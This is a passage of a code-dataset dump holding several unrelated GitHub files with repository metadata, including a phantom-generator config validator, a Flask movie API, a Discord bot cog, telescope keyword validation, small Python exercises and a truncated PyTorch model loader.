\"\"\"!\n \\brief Checks if global parameters are present\n\n \\param configuration Parsed configuration\n \\param is_image Set to True if the input for phantom generation is an image file\n\n \\note Raises an exception if there is any error\n \"\"\"\n\n error_msg = \"\"\n\n if not is_image:\n # Get size information from input image\n if \"rows_y\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"rows_y\\\" is missing.\\r\\n\"\n\n if \"cols_x\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"cols_x\\\" is missing.\\r\\n\"\n\n if \"distribution\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"distribution\\\" is missing.\\r\\n\"\n\n if \"perc_of_scatterers\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"perc_of_scatterers\\\" is missing.\\r\\n\"\n\n if \"phantom_format\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"phantom_format\\\" is missing.\\r\\n\"\n else:\n if configuration[\"phantom_format\"] == \"k_wave\":\n if \"sound_speed_c0_m_per_s\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"sound_speed_c0_m_per_s\\\" is missing.\\r\\n\"\n if \"density_rho0_kg_per_m3\" not in configuration:\n error_msg = error_msg + \"Parameter \\\"density_rho0_kg_per_m3\\\" is missing.\\r\\n\"\n\n if error_msg:\n raise Exception(\"One of more parameters is missing in the configuration file.\\r\\n\" + error_msg)\n\n\ndef validate_distribution(distribution):\n \"\"\"!\n \\brief Checks if a valid statiscal distribution was specified\n\n \\param distribution String containing the desired statistical distribution\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n supported_distributions = [\"uniform\", \"gaussian\", \"rayleigh\"]\n\n if distribution not in supported_distributions:\n error_msg = 'The distribution ' + distribution + \" is not supported.\\r\\n\"\n error_msg = error_msg + \"Supported distributions are:\"\n for dist in supported_distributions:\n error_msg = error_msg + \" \" + dist\n\n error_msg = error_msg + \".\\r\\n\"\n\n return error_msg\n\n\ndef validate_perc_of_scat(perc_of_scatterers):\n \"\"\"!\n \\brief Checks if percentage of scatterers points in the matrix is valid\n\n \\param perc_of_scatterers Percentage of area that will be filled with scaterrers [0%, 100%]\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n if perc_of_scatterers <= 0 or perc_of_scatterers > 100:\n error_msg = error_msg + \"Percentage of scatterers should be > 0 and < 100 %\\r\\n\"\n elif perc_of_scatterers == 100:\n warnings.warn_explicit(\"Percentage of scatterers is set to 100 %. Please check your configuration.\\r\\n\", UserWarning, \"\", 0)\n\n return error_msg\n\n\ndef validate_scat_gain(structure_type, scat_gain):\n \"\"\"!\n \\brief Checks if the relative amplitude of the scatterers of a region is valid\n\n \\param structure_type The structure for which the gain is being validated\n \\param scat_gain The gain of the scatterers inside the structure\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n if scat_gain < 0:\n error_msg = error_msg + \"Structure \" + structure_type + \": relative amplitude of the scatterers should be >= 0\\r\\n\"\n\n return error_msg\n\n\ndef validate_phantom_format(phantom_format):\n \"\"\"!\n \\brief Checks if the phantom compatibility format is valid\n\n \\param phantom_format The string with the phantom format (compatible toolbox)\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n supported_formats = [\"effec_scatterers\", \"k_wave\"]\n\n if phantom_format not in supported_formats:\n error_msg = 'The format ' + phantom_format + \" is not supported.\\r\\n\"\n error_msg = error_msg + \"Supported formats are:\"\n for dist in supported_formats:\n error_msg = error_msg + \" \" + dist\n\n error_msg = error_msg + \".\\r\\n\"\n\n return error_msg\n\n\ndef validate_structures(structures, num_of_rows, num_of_cols, num_of_z):\n \"\"\"!\n \\brief Checks if the structures are valid (are within boundaries and\n contain all parameters)\n\n \\param structures All the structures present in the configuration file\n \\param num_of_rows Number of rows of the phantom\n \\param num_of_cols Number of collumns of the phantom\n \\param num_of_z Number of slices of the phantom (3-D phantoms)\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n supported_structures = [\"circle\", \"ellipse\", \"rectangle\", \"free_polygon\", \"points\", \"sphere\"]\n\n for region in structures:\n region_type = region[\"type\"].lower()\n if region_type not in supported_structures:\n error_msg = 'The structure of type ' + region_type + \" is not supported.\\r\\n\"\n error_msg = error_msg + \"Supported structures are:\"\n for structure in supported_structures:\n error_msg = error_msg + \" \" + structure\n else:\n error_msg = error_msg + validate_scat_gain(region[\"type\"], region[\"scat_gain\"])\n if region_type == \"circle\":\n circ = struc.Circle([struc.Point(region[\"center_xy\"])], region[\"radius\"])\n error_msg = error_msg + circ.validate(num_of_rows, num_of_cols)\n elif region_type == \"ellipse\":\n ell = struc.Ellipse([struc.Point(region[\"center_xy\"])], region[\"semi_axis_x\"], region[\"semi_axis_y\"], region[\"rotation_angle_deg\"])\n error_msg = error_msg + ell.validate(num_of_rows, num_of_cols)\n elif region_type == \"rectangle\":\n rec = struc.Rectangle([struc.Point((region[\"top_left_corner_xy\"]))], region[\"length_x\"], region[\"length_y\"])\n error_msg = error_msg + rec.validate(num_of_rows, num_of_cols)\n elif region_type == \"free_polygon\":\n polygon = []\n for point in range(len(region[\"vertices_xy\"])):\n polygon.append(struc.Point(region[\"vertices_xy\"][point]))\n\n poly = struc.Polygon(polygon)\n error_msg = error_msg + poly.validate(num_of_rows, num_of_cols)\n elif region_type == \"points\":\n points = []\n for point in range(len(region[\"coordinates_xy\"])):\n points.append(struc.Point(region[\"coordinates_xy\"][point]))\n\n s_points = struc.SinglePoint(points)\n error_msg = error_msg + s_points.validate(num_of_rows, num_of_cols)\n elif region_type == \"sphere\":\n sp = struc.Sphere([struc.Point(region[\"center_xyz\"])], region[\"radius\"])\n error_msg = error_msg + sp.validate(num_of_rows, num_of_cols, num_of_z)\n\n return error_msg\n\n\ndef validate_configuration(configuration):\n \"\"\"!\n \\brief Checks if the phantom parameters are valid\n\n \\note Raises an exception if there is any error\n\n \\param configuration The parsed configuration\n\n \\return An empty string if no error is found; an error string otherwise\n \"\"\"\n\n error_msg = \"\"\n\n image_path = configuration.get(\"image_path\", \"\")\n\n if image_path == \"\":\n check_parameters_are_present(configuration, False)\n else:\n check_parameters_are_present(configuration, True)\n\n # Statiscal distributions used to generate the scatterers\n error_msg = error_msg + validate_distribution(configuration[\"distribution\"].lower())\n\n # Percentage of scatterers (non-zero elements) in the final matrix\n perc_of_scatterers = configuration[\"perc_of_scatterers\"]\n error_msg = error_msg + validate_perc_of_scat(perc_of_scatterers)\n\n # Phantom format\n phantom_format = configuration[\"phantom_format\"].lower()\n error_msg = error_msg + validate_phantom_format(phantom_format)\n\n if image_path == \"\":\n # Matrix size\n rows = configuration[\"rows_y\"]\n cols = configuration[\"cols_x\"]\n num_of_z = configuration.get(\"depth_z\", 1)\n if (num_of_z > 1) and (phantom_format == \"effec_scatterers\"):\n error_msg = error_msg + \"effec_scatterers only supports 2-D phantoms\\r\\n\"\n\n # Check if the structures defined are valid\n error_msg = error_msg + validate_structures(configuration[\"structures\"], rows, cols, num_of_z)\n else:\n input_image = Path(image_path)\n\n if not input_image.is_file() and not input_image.is_dir():\n raise Exception(\"Input image \\\"\" + image_path + \"\\\" was not found.\")\n\n if (phantom_format != \"effec_scatterers\"):\n error_msg = error_msg + \"Using image as input is supported only with effec_scatterers format\\r\\n\"\n\n return error_msg\n","repo_name":"medeirosjd/phantom_generator","sub_path":"mx_us_phantom/config_validation.py","file_name":"config_validation.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"18718754460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('search', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='film',\n name='latitude',\n field=models.CharField(max_length=200, default=datetime.datetime(2015, 8, 28, 1, 7, 4, 507069, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='film',\n name='longitude',\n field=models.CharField(max_length=200, default=datetime.datetime(2015, 8, 28, 1, 7, 20, 821824, tzinfo=utc)),\n preserve_default=False,\n ),\n ]\n","repo_name":"CodeLizards/Uber-Coding-Challenge-SF-Movies","sub_path":"search/migrations/0002_auto_20150828_0107.py","file_name":"0002_auto_20150828_0107.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15346479003","text":"import logging\nimport re\n\nlogger = logging.getLogger(__name__)\n\n# global dictionary of permitted combinations of values by backend\npermitted = {\n 'ACSIS': {\n 'inbeam': [\"POL\"],\n 'sideband': [\"LSB\", \"USB\"],\n 'sideband_filter': [\"DSB\", \"SSB\", \"2SB\"],\n 'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n },\n\n 'DAS': {\n 'inbeam': [\"ROVER\"],\n 'sideband': [\"LSB\", \"USB\"],\n 'sideband_filter': [\"DSB\", \"SSB\", \"UNKNOWN\"],\n 'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n },\n\n 'AOS-C': {\n 'sideband': [\"LSB\", \"USB\"],\n 'sideband_filter': [\"DSB\", \"SSB\", 'UNKNOWN'],\n 'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n },\n\n 'SCUBA-2': {\n 'inbeam': [\"BLACKBODY\", \"FTS2\", \"POL\", \"POL2_CAL\",\n \"POL2_WAVE\", \"POL2_ANA\", \"SHUTTER\"],\n 'switching_mode': [\"NONE\", \"SELF\", \"SPIN\"]\n }\n}\n\n\ndef instrument_keywords(strictness, frontend, backend, keyword_dict):\n \"\"\"\n Generates a list of keywords for the CAOM-2 field Instrument.keywords.\n\n Keywords to add are passed in through a dictionary, which allows special\n processing to be applied to particular keywords.\n\n Arguments:\n strictness: one of 'raw', 'stdpipe', or 'external', where raw means every\n violation of standards is reported as an error, 'stdpipe'\n allows some missing values that can legitimately be dropped\n during normal processing, and 'external' reports invalid values\n but ignores missing keywords and always returns bad=False.\n frontend: receiver name\n backend: spectrometer name for heterodyne observations\n keyword_dict: a dictionary containing candidate keywords. Keys for the\n dictionary include:\n inbeam: list of optical devices in the optical path\n x_scan_pat: scan pattern (x makes it the last item in a sorted list)\n sideband: for heterodyne observations, the signal sideband (USB, LSB)\n sideband_mode: single or double sideband (SSB, DSB)\n swiching_mode: the switching mode in use\n\n Returns a tuple containing:\n bad: True if an error was encountered, False otherwise\n keywords: a list containing the keywords to be used\n\n Usage: (omitting error checking)\n For a raw observation:\n frontend = common['instrume'].upper()\n backend = common['backend'].upper()\n keyword_dict = {}\n keyword_dict['switching_mode'] = common['sw_mode']\n keyword_dict['inbeam'] = common['inbeam']\n if backend in ('ACSIS', 'DAS', 'AOS-C'):\n keyword_dict['sideband'] = subsystem['obs_sb']\n keyword_dict['sieband_mode'] = subsystem['sb_mode']\n mybad, keywords = instrument_keywords('raw', keyword_dict)\n For processed data:\n keyword_dict = {}\n keyword_dict['frontend'] = header['INSTRUME']\n keyword_dict['backend'] = header['BACKEND']\n keyword_dict['switching_mode'] = header['SW_MODE']\n keyword_dict['inbeam'] = header['INBEAM']\n if header['BACKEND'] in ('ACSIS', 'DAS', 'AOS-C'):\n keyword_dict['sideband'] = header['OBS_SB']\n keyword_dict['sieband_filter'] = header['SB_MODE']\n mybad, keywords = instrument_keywords('stdpipe',\n frontend,\n backend,\n keyword_dict)\n \"\"\"\n bad = False\n\n # The backend is not mandatory for external data products, but the\n # rest of the backend-dependent validity checks must then be skipped\n\n # This first block of code just reports warnings and sets bad to T\n myBackend = backend.strip().upper()\n myFrontend = frontend.strip().upper()\n\n if myBackend not in permitted:\n logger.warning('instrument_keywords does not recognize ' +\n '\"%s\" as a permitted backend', backend)\n bad = True\n else:\n # The remaining checks only work if backend is permitted\n if myBackend in ('ACSIS', 'DAS', 'AOS-C'):\n if 'sideband' not in keyword_dict and strictness == 'raw':\n logger.warning('with strictness = %s'\n ' backend = %s'\n ' frontend = %s'\n ' sideband is not defined',\n strictness, backend, frontend)\n bad = True\n if 'sideband' in keyword_dict:\n sideband = keyword_dict['sideband'].strip().upper()\n if sideband not in permitted[myBackend]['sideband']:\n logger.warning('sideband %s'\n ' is not in the list permited for %s: %s',\n sideband, myBackend,\n repr(permitted[myBackend]['sideband']))\n bad = True\n\n if ('sideband_filter' not in keyword_dict and\n strictness != 'external'):\n\n logger.warning('sideband_filter is not defined')\n bad = True\n if 'sideband_filter' in keyword_dict:\n sideband_filter = \\\n keyword_dict['sideband_filter'].strip().upper()\n\n # Sideband filter was not recorded before 1994-04-14 and is\n # stored as a blank '' in ACSIS for DAS and AOS-C data. It can\n # be interpretted into DSB for every receiver except RXB3,\n # where a blank really means UNKNOWN, forcing the keyword to be\n # omitted.\n if sideband_filter == '' and frontend != 'RXB3':\n sideband_filter = 'DSB'\n keyword_dict['sideband_filter'] = sideband_filter\n\n elif sideband_filter == 'UNKNOWN' and backend in ['DAS',\n 'AOS-C']:\n del keyword_dict['sideband_filter']\n\n elif (sideband_filter not in\n permitted[myBackend]['sideband_filter']):\n logger.warning(\n 'sideband_filter %s'\n ' is not in the list permited for %s: %s',\n sideband_filter, backend,\n repr(permitted[myBackend]['sideband_filter']))\n bad = True\n else:\n if 'sideband' in keyword_dict:\n logger.warning('sideband is not permitted for %s',\n backend)\n bad = True\n\n if 'sideband_filter' in keyword_dict:\n logger.warning('sideband_filter is not permitted for %s',\n backend)\n bad = True\n\n if 'switching_mode' not in keyword_dict and strictness == 'raw':\n logger.warning('switching_mode is not defined')\n bad = True\n if 'switching_mode' in keyword_dict:\n switching_mode = keyword_dict['switching_mode'].strip().upper()\n # DAS observations often have 'FREQ' instead of 'FREQSW'\n if switching_mode == 'FREQ':\n switching_mode = 'FREQSW'\n keyword_dict['switching_mode'] = switching_mode\n\n if switching_mode not in permitted[myBackend]['switching_mode']:\n logger.warning('switching_mode %s'\n ' is not in the list permited for %s: %s',\n switching_mode, backend,\n repr(permitted[myBackend]['switching_mode']))\n bad = True\n\n # If there were no actual errors, compose the keyword list\n keywords = []\n if not bad:\n for key in sorted(keyword_dict.keys()):\n if key == 'inbeam':\n inbeam_list = re.split(r'\\s+',\n keyword_dict['inbeam'].strip().upper())\n for item in inbeam_list:\n if not re.search(r'POL|FTS|SHUTTER', item):\n keywords.append(item)\n else:\n keywords.append(keyword_dict[key].strip().upper())\n\n return (bad, keywords)\n","repo_name":"eaobservatory/python-jcmt2caom2","sub_path":"lib/jcmt2caom2/jsa/instrument_keywords.py","file_name":"instrument_keywords.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4255509644","text":"from flask import Flask, request\nfrom flask_restx import Api, Resource\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom schemas import movie_schema, movies_schema # Импорт схем из файла schemas.py\nfrom models import * # Импорт классов для работы с БД\n\n\"\"\"Конфигурация приложения\"\"\"\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db' # Адрес базы данных\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['JSON_AS_ASCII'] = False\napp.config['RESTX-JSON'] = {'ensure_ascii': False, 'indent': 3}\n\ndb = SQLAlchemy(app)\n\napi = Api(app) # Подключение Api\nmovie_ns = api.namespace('movies')\n\n\n@movie_ns.route(\"/\") # Основная страница\nclass MovieView(Resource):\n\n def get(self):\n all_movies = db.session.query(Movie.id,\n Movie.title,\n Movie.description,\n Movie.rating,\n Movie.trailer,\n Genre.name.label('genre'),\n Director.name.label('director')).join(Genre).join(Director)\n\n director_id = request.args.get('director_id')\n genre_id = request.args.get('genre_id')\n if director_id:\n all_movies = all_movies.filter(Movie.director_id == director_id)\n if genre_id:\n all_movies = all_movies.filter(Movie.genre_id == genre_id)\n\n return movies_schema.dump(all_movies), 200\n\n def post(self): # Добавление нового элемента в базу данных\n req_json = request.json\n new_moive = Movie(**req_json)\n with db.session.begin():\n db.session.add(new_moive)\n return f\"Новый фильм {new_moive.id} добавлен\", 201\n\n\n@movie_ns.route(\"/\") # Действие с объектом БД по его id\nclass MovieView(Resource):\n\n def get(self, movie_id: int): # Получение объекта по ид\n movie = db.session.query(Movie).get(movie_id)\n if movie:\n return movie_schema.dump(movie), 200\n return \"Фильм не найден\", 404\n\n def put(self, movie_id: int): # Обновление объекта по ИД\n movie = db.session.query(Movie).get(movie_id) # Запрос из БД нужного объекта по ИД\n if not movie: # Если объекта с нужным ИД не найдено, то возврат ошибки\n return f\"Такого фильма c ид {movie_id} нет\", 404\n req_json = request.json\n\n movie.title = req_json['title']\n movie.description = req_json['description']\n movie.trailer = req_json['trailer']\n movie.year = req_json['year']\n movie.rating = req_json['rating']\n movie.genre_id = req_json['genre_id']\n movie.director_id = req_json['director_id']\n\n db.session.add(movie)\n db.session.commit()\n return f\"Фильм c ид {movie_id} обновлён\", 204\n\n def delete(self, movie_id: int): # Удаление объекта по ид\n movie_to_del = db.session.query(Movie).get(movie_id)\n if not movie_to_del:\n return f\"Фильм с ид {movie_id} не найден\", 404\n db.session.delete(movie_to_del)\n db.session.commit()\n return 201\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"MariaKovalyova/lesson_17","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30815679085","text":"import json\nimport sys\nimport traceback\n\nimport discord\nfrom discord.ext import commands, tasks\nfrom discord.utils import get\n\nimport errors\nimport data\nimport validation\nimport rally_api\n\nfrom cogs import update_cog\n\nfrom utils import pretty_print\nfrom constants import *\n\n\nclass ChannelCommands(commands.Cog):\n\n \"\"\"\n Cog for processing commands from a specifc channel.\n Deals with removing, adding, and viewing mappings from Creator Coin to a channel.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_after_invoke(self, ctx):\n await pretty_print(\n ctx, \"Command completed successfully!\", title=\"Success\", color=SUCCESS_COLOR\n )\n\n @errors.standard_error_handler\n async def cog_command_error(self, ctx, error):\n \"\"\"\n A special method that is called whenever an error is dispatched inside this cog.\n This is similar to on_command_error() except only applying to the commands inside this cog.\n\n Parameters\n __________\n\n ctx (Context) – The invocation context where the error happened.\n error (CommandError) – The error that happened.\n\n \"\"\"\n\n print(\"Ignoring exception in command {}:\".format(ctx.command), file=sys.stderr)\n traceback.print_exception(\n type(error), error, error.__traceback__, file=sys.stderr\n )\n\n @commands.command(\n name=\"set_channel_mapping\",\n help=\" \"\n + \"Set a mapping between coin and channel. Channel membership will be constantly updated.\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def set_coin_for_channel(\n self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n ):\n data.add_channel_coin_mapping(\n ctx.guild.id, coin_name, coin_amount, channel.name\n )\n await update_cog.force_update(self.bot, ctx)\n\n @commands.command(\n name=\"one_time_channel_mapping\",\n help=\" \"\n + \" Grant/deny access to a channel instantly.\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def one_time_channel_mapping(\n self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n ):\n\n for member in ctx.guild.members:\n rally_id = data.get_rally_id(member.id)\n if rally_id:\n balances = rally_api.get_balances(rally_id)\n await update_cog.grant_deny_channel_to_member(\n {\n data.GUILD_ID_KEY: ctx.guild.id,\n data.COIN_KIND_KEY: coin_name,\n data.REQUIRED_BALANCE_KEY: coin_amount,\n data.CHANNEL_NAME_KEY: channel.name,\n },\n member,\n balances,\n )\n await update_cog.force_update(self.bot, ctx)\n\n @commands.command(\n name=\"unset_channel_mapping\",\n help=\" \"\n + \"Unset a mapping between coin and channel\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def unset_coin_for_channel(\n self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n ):\n data.remove_channel_mapping(ctx.guild.id, coin_name, coin_amount, channel.name)\n\n @commands.command(name=\"get_channel_mappings\", help=\"Get channel mappings\")\n @validation.owner_or_permissions(administrator=True)\n async def get_channel_mappings(self, ctx):\n await ctx.send(\n json.dumps(\n [\n json.dumps(mapping)\n for mapping in data.get_channel_mappings(ctx.guild.id)\n ]\n )\n )\n\n @commands.command(name=\"set_purchase_message\", help=\"Change the $purchase message\")\n @validation.owner_or_permissions(administrator=True)\n async def set_purchase_message(self, ctx, *, message):\n data.set_purchase_message(ctx.guild.id, message)\n\n @commands.command(name=\"purchase\", help=\"Learn how you can purchase\")\n @commands.guild_only()\n async def purchase(self, ctx):\n message = data.get_purchase_message(ctx.guild.id)\n if message is not None:\n await ctx.send(message)\n else:\n await ctx.send(DEFAULT_PURCHASE_MESSAGE)\n\n @commands.command(name=\"set_donate_message\", help=\"Change the $donate message\")\n @validation.owner_or_permissions(administrator=True)\n async def set_donate_message(self, ctx, *, message):\n data.set_donate_message(ctx.guild.id, message)\n\n @commands.command(name=\"donate\", help=\"Learn how you can donate\")\n @commands.guild_only()\n async def donate(self, ctx):\n message = data.get_donate_message(ctx.guild.id)\n if message is not None:\n await ctx.send(message)\n else:\n await ctx.send(DEFAULT_DONATE_MESSAGE)\n","repo_name":"nemani/RallyRoleBot","sub_path":"rallyrolebot/cogs/channel_cog.py","file_name":"channel_cog.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"28704279333","text":"import json\nfrom datetime import datetime\nfrom asgiref.sync import async_to_sync\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom crawler.models import Classification\nfrom channels.layers import get_channel_layer\n\ncurrent_rank_data = None\n\n# 추천 테이블에 값이 save 되면 자동으로 호출된다. 다만, update_or_create 함수를 호출하면 계속 호출된다. update_or_create 내부에 save를 호출하는 코드가 있어 그런것 같다...\n@receiver(post_save, sender=Classification)\ndef send_signal(sender, **kwargs):\n\n print(\"socket signal 실행\")\n try:\n # 참고 https://stackoverflow.com/questions/21925671/how-to-convert-django-model-object-to-dict-with-its-fields-and-values\n recommendation = Classification.objects.filter(ranked_date=str(datetime.today().strftime('%Y-%m-%d'))).values()[0]\n except Exception as e:\n print(e)\n return\n\n global current_rank_data\n data = json.dumps(recommendation, cls=DjangoJSONEncoder, ensure_ascii=False)\n if current_rank_data != data: # 랭킹 데이터를 저장해놓고 이전과 같지 않으면 연결되어있는 client에 랭킹 데이터를 전송한다.\n current_rank_data = data\n channel_layer = get_channel_layer()\n async_to_sync(channel_layer.group_send)(\n \"ASTS\",\n {\n 'type': 'client_notification',\n 'data': data\n }\n )\n else:\n return\n\n\n\n\n","repo_name":"chb1828/automatic-stock-trading-system-server","sub_path":"client_socket/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72631874828","text":"# Write the program to find the sum of digits of a number accepted from user?\n\nNum=int(input(\"Enter a number:\"))\nsumn=0\nrem=0\nwhile Num>0:\n rem=Num%10\n sumn=sumn+rem\n Num=Num//10\nprint(\"sum of given num is:\",sumn)\n","repo_name":"Prashanth-PL/VN2-T03-100","sub_path":"_08_Loops/self_notes/12_sum_of_digits_of_number.py","file_name":"12_sum_of_digits_of_number.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6351116485","text":"import math\nimport pygame\nimport key\n\nclass Enemy:\n def __init__(self, pos, size, speed):\n self.pos = pos # self.pos[0] --> x self.pos[1] --> y\n self.size = size # tamany del enemic\n self.speed = speed # velocitat del enemic\n self.t=speed #radians moviment circular\n\n # Funcio per dibuixar l'enemic\n def draw(self, screen):\n #Dibuixa el borde negre del enemic\n pygame.draw.rect(screen, key.BLACK_BORDER , (self.pos[0], self.pos[1], self.size, self.size))\n #Dibuixa el interior del enemic\n pygame.draw.rect(screen, key.ENEMY_COLOUR , (self.pos[0]+3, self.pos[1]+3, self.size-6, self.size-6))\n\n\n # Funcio per a moure el enemic horitzontalment\n def move_horizontal(self, x1, x2) :\n\n # Mou el enemic hortizontalment\n self.pos[0] += self.speed\n # Si es passa del limit per l'esquerra \n if self.pos[0] <= x1 :\n self.pos[0] = x1 # Posa la posicio x del enemic el maxima a l' esquerra que pot estar\n self.speed = -1 * self.speed # Canvia de sentit la velocitat\n # Si es passa del limit per l'esquerra\n elif self.pos[0] >= x2 :\n self.pos[0] = x2 # Posa la posicio x del enemic el maxima a la dreta que pot estar\n self.speed = -1 * self.speed # Canvia de sentit la velocitat\n \n \n\n\n # Funcio per moure el enemic verticalment\n def move_vertical(self, y1, y2) :\n \n # Mou el enemic verticalment\n self.pos[1] += self.speed\n # Si es passa del limit per dalt\n if self.pos[1] <= y1 :\n self.pos[1] = y1 # Posa la posicio y del enemic el maxim amunt que pot estar\n self.pos[1] += self.speed # Canvia de sentit la velocitat\n # Si es passa del limit per baix\n elif self.pos[1] >= y2 :\n self.pos[1] = y2 # Posa la posicio y del enemic el maxim avall que pot estar\n self.pos[1] += self.speed # Canvia de sentit la velocitat\n \n \n # Funcio per moure el enemic circularment\n def move_circ(self,a,b,r):\n t=math.radians(self.t)\n self.pos[0] = r * math.cos(t) + a\n self.pos[1] = r * math.sin(t) + b\n self.t += 2\n if self.t >= 360:\n self.t = 0\n \n \n\n\n \n ","repo_name":"ignitasalex/sad","sub_path":"Final/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38901630871","text":"from aquarium import Aquarium\nfrom clownfish import Clownfish\nfrom tang import Tang\nfrom kong import Kong\n\naquarium = Aquarium()\n\n# checking what happens with empty aquarium\naquarium.get_status()\naquarium.feed()\naquarium.remove_fat_fishes()\n\n# creating fishes\nclownfish_1 = Clownfish(\"Laughy\", 9, \"orange\", \"white\")\nclownfish_2 = Clownfish(\"Funny\", 10, \"yellow\", \"pink\")\ntong_1 = Tang(\"Dumby\", 7, \"blue\")\nkong_1 = Kong(\"Fatty\", 18, \"grey\")\n\n# adding fishes to the aquarium\naquarium.add_fish(clownfish_1)\naquarium.add_fish(clownfish_2)\naquarium.add_fish(tong_1)\naquarium.add_fish(kong_1)\n\n# testing\n\n\ndef test_feeding():\n print(\"# feeding the aquarium:\")\n aquarium.feed()\n print_status()\n\n\ndef test_removing():\n print(\"# removing fat fishes:\")\n aquarium.remove_fat_fishes()\n print_status()\n\n\ndef print_status():\n aquarium.get_status()\n\n\nprint(\"# Aquarium with fishes:\")\nprint_status()\n\ntest_feeding()\n\ntest_removing()\n\ntest_feeding()\ntest_feeding()\n\ntest_removing()\n","repo_name":"Komaxor/ibs-2020-10-application-development-normal-exam","sub_path":"aquarium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"28182233814","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ = 'TesterCC'\n# __time__ = '17/8/29 13:31'\n\n\n# http://www.imooc.com/article/17119\n\nfrom selenium import webdriver\n\nurl = \"https://detail.tmall.com/item.htm?spm=a230r.1.14.10.VapbhB&id=541510809037&cm_id=140105335569ed55e27b&abbucket=5&sku_properties=5919063:6536025\"\n# url = \"http://www.imooc.com/article/17119\"\n\ndriver = webdriver.Firefox()\n# driver = webdriver.Firefox(executable_path='C:/xxx/Downloads/geckodriver-v0.15.0-win64/geckodriver.exe') # if don't config browser driver path\n\ndriver.get(url)\n\nprint(driver.page_source)","repo_name":"yudn/Python3Scripts","sub_path":"imooc/selenium_demo/firefoxdemo.py","file_name":"firefoxdemo.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"33004758040","text":"import os\nimport json\nfrom collections import OrderedDict\n\nfrom tqdm import tqdm_notebook\nfrom tqdm.autonotebook import trange\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\n\nfrom torchvision import models\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .models import UpCi2\n\ndef get_model_UpSi2(out_classes=2, device=None, modes=[1, 1, 1], down_conv=False):\n\tassert len(modes) == 3, 'len(modes) not 3'\n\tresnet18 = models.resnet18(pretrained=True)\n\tfor itm in resnet18.parameters():\n\t\titm.requires_grad = False\n\tresnet_layers = {'conv1': resnet18.conv1, 'bn1': resnet18.bn1, 'relu': resnet18.relu,\n\t\t\t\t\t 'maxpool': resnet18.maxpool, 'layer1': resnet18.layer1, 'layer2': resnet18.layer2,\n\t\t\t\t\t 'layer3': resnet18.layer3, 'layer4': resnet18.layer4, 'avgpool': resnet18.avgpool}\n\tresnet_keys_list = list(resnet_layers.keys())\n\tresnet_1_dct, resnet_2_dct, resnet_3_dct, resnet_4_dct, = OrderedDict(), OrderedDict(), OrderedDict(), OrderedDict()\n\tfor key in resnet_keys_list[:5]:\n\t\tresnet_1_dct.update({key: resnet_layers[key]})\n\tresnet_2_dct.update({'layer2': resnet_layers['layer2']})\n\tresnet_3_dct.update({'layer3': resnet_layers['layer3']})\n\tresnet_4_dct.update({'layer4': resnet_layers['layer4']})\n\tresnet_4_dct.update({'avgpool': 